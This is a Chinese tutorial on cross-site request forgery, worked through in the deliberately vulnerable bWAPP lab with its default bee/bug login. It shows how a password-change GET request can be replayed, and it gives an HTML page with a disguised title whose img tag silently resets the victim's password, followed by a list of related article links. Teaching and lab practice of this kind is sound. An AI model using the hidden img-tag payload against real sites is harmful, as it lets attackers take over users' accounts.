31、CSRF漏洞介绍

简介: 31、CSRF漏洞介绍

CSRF:跨站请求伪造,伪装成用户身份来执行一些非用户自愿的恶意以及非法操作

CSRF和XSS区别:

1、CSRF需要登陆后操作,XSS不需要

2、CSRF通过伪装成受信任用户请求受信任的网站

一、环境:BWAPP


二、登陆,默认账号为:bee,密码为:bug


0a2653c851af460fa595bd959398a8f1.png

三、选择从在csrf的页面,将密码修改为1111,change


0eacb84100b54626af849e6b562bf92a.png

四、分析url


http://192.168.1.119/bwapp/csrf_1.php?password_new=1111&password_conf=1111&action=change

五、退出账号,重新登陆一下,密码已经修改为1111


六、重修修改一下url,直接访问这个这个地址,


http://192.168.1.119/bwapp/csrf_1.php?password_new=2222&password_conf=2222&action=change

密码被重置为2222

七、隐蔽利用


1、新建一个html页面,将url地址重新修改一下,添加到img标签下的src属性,

<!DOCTYPE html>
<html>
<head>
  <title>哎呦不错哦。。。</title>
</head>
  <body>
       <h2>好久不见<h2>
    <img src="http://192.168.1.119/bwapp/csrf_1.php?password_new=3333&password_conf=3333&action=change">
  </body>
</html>

2、访问这个htmll,自动访问修改后的url,密码也自动修改了

禁止非法,后果自负

目录
相关文章
|
2月前
|
安全 数据安全/隐私保护
CSRF漏洞利用工具 -- CSRFTester
CSRF漏洞利用工具 -- CSRFTester
33 0
|
2月前
|
安全 数据安全/隐私保护
小课堂 -- CSRF漏洞介绍
小课堂 -- CSRF漏洞介绍
18 0
|
2月前
|
安全 数据安全/隐私保护
第二轮学习笔记:CSRF跨站请求伪造漏洞
第二轮学习笔记:CSRF跨站请求伪造漏洞
15 0
|
安全 数据安全/隐私保护
CSRF漏洞利用工具 -- CSRFTester
CSRF漏洞利用工具 -- CSRFTester
283 0
CSRF漏洞利用工具 -- CSRFTester
|
11月前
|
存储 安全 JavaScript
实战漏洞挖掘-csrf+存储selfxss漏洞组合拳
前一阵子在疯狂学习,看了很多文章,也学习到了不少,所以也尝试着去挖一挖洞,把学习到的思路引入到实际中。在挖某网站的时候,发现了一枚CSRF+存储型selfxss的漏洞组合拳成功打到cookie。
118 0
|
11月前
|
存储 安全 PHP
WEB常见漏洞之CSRF(靶场篇)
WEB常见漏洞之CSRF(靶场篇)
343 0
|
11月前
|
安全 JavaScript 前端开发
WEB常见漏洞之CSRF(基础原理篇)
WEB常见漏洞之CSRF(基础原理篇)
132 1
|
11月前
|
存储 JSON 安全
一文深入了解CSRF漏洞
1.1. 定义 跨站请求伪造 (英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding ,通常缩写为 CSRF 或者 XSRF , 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟 跨站脚本(XSS) 相比, XSS 利用的是用户对指定网站
379 0
|
安全 数据安全/隐私保护
第二轮学习笔记:CSRF跨站请求伪造漏洞
第二轮学习笔记:CSRF跨站请求伪造漏洞
63 0
第二轮学习笔记:CSRF跨站请求伪造漏洞
|
安全 数据安全/隐私保护
31、CSRF漏洞介绍
31、CSRF漏洞介绍
63 0
31、CSRF漏洞介绍